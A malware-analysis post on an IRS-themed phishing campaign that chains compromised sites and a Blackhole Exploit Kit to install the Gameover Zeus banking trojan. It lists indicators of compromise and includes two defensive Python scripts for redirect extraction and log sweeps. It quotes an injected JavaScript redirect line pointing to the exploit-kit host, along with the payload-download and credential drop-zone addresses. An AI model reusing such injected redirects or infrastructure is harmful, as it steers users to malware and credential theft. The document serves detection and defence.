IRS-themed spam continues dropping Gameover Zeus

Subject: IRS notification of your tax appeal status.
URL: hxxp://annebickmoreswimming.co[.]uk/SsXbaqXv/index.html
The link text 'Online Tax Appeal' in the message points to the URL shown above. The landing page has no visible content of its own, only five script includes:
pancarga[.]com /a5861cqc/js.js
suhutgundem[.]com /VLj9KNR8/js.js
paypal.socialo[.]pl /q9QQjLxa/js.js
personalart[.]pl /93b7jQCc/js.js
m.slevako[.]cz /w4eyfSFP/js.js

Each of these JavaScript redirectors contains a document.location assignment that sends victims to a Blackhole Exploit Kit (associated with 207.210.65.109):

document.location='hxxp://178.77.99[.]145:8080/showthread.php?t=d44175c6da768b70';

The exploit kit then downloads the Gameover Zeus installer from the following location:

hxxp://178.77.99[.]145:8080/q.php?f=e0c3a&e=2

File: info.exe
MD5:c4df59ee070a33e07bbff66c0d46b421
Size: 274,383 bytes
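The redirect-to-landing-to-payload chain above is easy to triage automatically once the JavaScript bodies are in hand. The following Python script is an added example, not code from the original post: it pulls document.location / window.location targets out of redirector files, undoes the "hxxp" and "[.]" defanging and stray spaces that reports add, and classifies each target against the two URL shapes seen on this page (the /showthread.php?t=<16 hex> landing page and the /q.php?f=...&e=... payload request). The redirector bodies are constructed stand-ins that mimic the snippet above; the benign.example entries and the classification labels are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed stand-ins for the js.js redirector bodies (not the real files).
# The first is pasted in the defanged, curly-quoted form seen in the post;
# the benign.example entries are assumed controls that must not be flagged.
SAMPLE_REDIRECTORS = {
    "pancarga[.]com/a5861cqc/js.js":
        "document.location=’hxxp://178.77.99[.]145:8080 /showthread.php?t=d44175c6da768b70 ‘;",
    "m.slevako[.]cz/w4eyfSFP/js.js":
        'var x=1;\ndocument.location = "http://178.77.99.145:8080/q.php?f=e0c3a&e=2";',
    "benign.example/help.js":
        "window.location.href='https://www.example.com/help';",
    "benign.example/app.js":
        "window.onload=function(){console.log('hi');};",
}

# document.location / window.location(.href) assignment with straight or curly quotes.
LOCATION_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*["'‘’]([^"'‘’]+)["'‘’]"""
)


def refang(url):
    """Undo report-style defanging (hxxp, [.], [:], inserted spaces) so the URL parses."""
    url = url.strip()
    url = re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)
    url = url.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"\s+", "", url)


def classify(url):
    """Label a redirect target using the URL shapes observed in this campaign."""
    parts = urlsplit(url)
    path = parts.path.lower()
    query = parse_qs(parts.query)
    if path.endswith("/showthread.php") and re.fullmatch(r"[0-9a-f]{16}", query.get("t", [""])[0]):
        return "blackhole_landing"
    if path.endswith("/q.php") and "f" in query and "e" in query:
        return "blackhole_payload"
    return "other_redirect"


def extract_redirects(js):
    """Return (refanged_url, label) for every location assignment in a script body."""
    return [(url, classify(url)) for url in (refang(m) for m in LOCATION_RE.findall(js))]


def scan_redirectors(sources):
    """Map each script name to the redirects it performs."""
    return {name: extract_redirects(js) for name, js in sources.items()}


def hosts_contacted(results):
    """Set of host[:port] values a victim's browser would be sent to."""
    return {urlsplit(url).netloc for hits in results.values() for url, _ in hits}


if __name__ == "__main__":
    results = scan_redirectors(SAMPLE_REDIRECTORS)
    for name, hits in results.items():
        for url, label in hits:
            print(f"{name}: {label} -> {url}")
    print("hosts:", sorted(hosts_contacted(results)))
```

Feeding the script the real js.js bodies (fetched from an isolated analysis box, never a user workstation) gives the exploit-kit host directly, which is the indicator to block at the proxy while the redirector domains are still being cleaned up.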

This installer is detected by 3 of 43 AV vendors on VirusTotal.com. It then drops the Gameover Zeus binary into %APPDATA%, with the following properties:

File: eluqf.exe
MD5: cc6d35de55dee429dc801535b8104caa
Size: 273,944 bytes
Other: This file is digitally signed by ‘aPgdobQNbLOM’
Company Name: qwetr Corporation
File Description: qwetr Magnifier
File Version: 5.00.2151.1
Internal Name: MAGNIFIER
Legal Copyright: Copyright (C) qwetr Corp. 1981-1999
Original Filename: MAGNIFY.EXE
Product Name: qwetr(R) Windows (R) 2000 Operating System
Timestamp: 2011:02:03 19:50:12+01:00

The version-information resource is a copy of the Windows 2000 Magnifier (MAGNIFY.EXE) metadata with "Microsoft" replaced by "qwetr", and the 2011 timestamp does not match the 1981-1999 copyright line; both are useful triage tells. This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal.com.
The Gameover variant had a bot id of "ppcz13" and a cid of "3004", and posted online banking credentials stolen from victims to a drop zone at 87.97.164.223 over port 22005.
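The network indicators on this page (redirector domains, the exploit-kit host on port 8080, the drop zone on port 22005) describe three stages a victim passes through, and a retrospective log sweep should report how far each host got, not just whether a line matched. The script below is an added example, not code from the original post: it parses constructed proxy/firewall lines in an assumed "<date> <time> <src> -> <dst>:<port> host=<name>" format, tags each line with the stage it corresponds to, and rolls the hits up to the deepest stage seen per source address. The log lines, the 10.0.0.x victims and the 198.51.100.x (TEST-NET-2) servers are all constructed.

```python
import re

# Indicators taken from the analysis above.
EXPLOIT_KIT = ("178.77.99.145", 8080)
DROP_ZONE = ("87.97.164.223", 22005)
REDIRECTOR_HOSTS = {
    "pancarga.com", "suhutgundem.com", "paypal.socialo.pl",
    "personalart.pl", "m.slevako.cz",
}

# Chain stages in the order a victim passes through them.
STAGES = ["redirector_fetch", "exploit_kit_contact", "credential_post"]

# Constructed proxy/firewall log lines (not from any real environment).
# Assumed format: "<date> <time> <src_ip> -> <dst_ip>:<dst_port> host=<name or ->"
SAMPLE_LOG = """\
2012-05-01 09:12:01 10.0.0.5 -> 198.51.100.12:80 host=annebickmoreswimming.co.uk
2012-05-01 09:12:02 10.0.0.5 -> 198.51.100.20:80 host=pancarga.com
2012-05-01 09:12:03 10.0.0.5 -> 178.77.99.145:8080 host=-
2012-05-01 09:12:40 10.0.0.5 -> 87.97.164.223:22005 host=-
2012-05-01 09:13:10 10.0.0.7 -> 198.51.100.9:443 host=mail.example.com
2012-05-01 09:14:00 10.0.0.9 -> 178.77.99.145:8080 host=-
2012-05-01 09:14:30 10.0.0.9 -> 198.51.100.9:443 host=mail.example.com
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) -> (\S+):(\d+) host=(\S+)$")


def classify(dst_ip, dst_port, host):
    """Map one connection to a chain stage, or None if it matches no indicator."""
    if (dst_ip, dst_port) == DROP_ZONE:
        return "credential_post"
    if (dst_ip, dst_port) == EXPLOIT_KIT:
        return "exploit_kit_contact"
    if host in REDIRECTOR_HOSTS:
        return "redirector_fetch"
    return None


def scan_log(text):
    """Return (timestamp, src_ip, stage, 'dst:port') for every line that hits an indicator."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line; a production sweep would count these
        ts, src, dst, port, host = m.groups()
        stage = classify(dst, int(port), host)
        if stage:
            hits.append((ts, src, stage, f"{dst}:{port}"))
    return hits


def furthest_stage(hits):
    """Per source address, the deepest stage of the chain observed."""
    rank = {stage: i for i, stage in enumerate(STAGES, 1)}
    deepest = {}
    for _, src, stage, _ in hits:
        if rank[stage] > rank.get(deepest.get(src), 0):
            deepest[src] = stage
    return deepest


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ts, src, stage, dst in hits:
        print(f"{ts} {src} {stage} ({dst})")
    for src, stage in sorted(furthest_stage(hits).items()):
        print(f"{src}: furthest stage = {stage}")
```

A host that reached credential_post needs password resets for every banking and web credential used on it, not just a malware clean-up; a host that stopped at exploit_kit_contact may have been served a landing page without a working exploit, and the %APPDATA% drop described above is the next thing to check on it.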
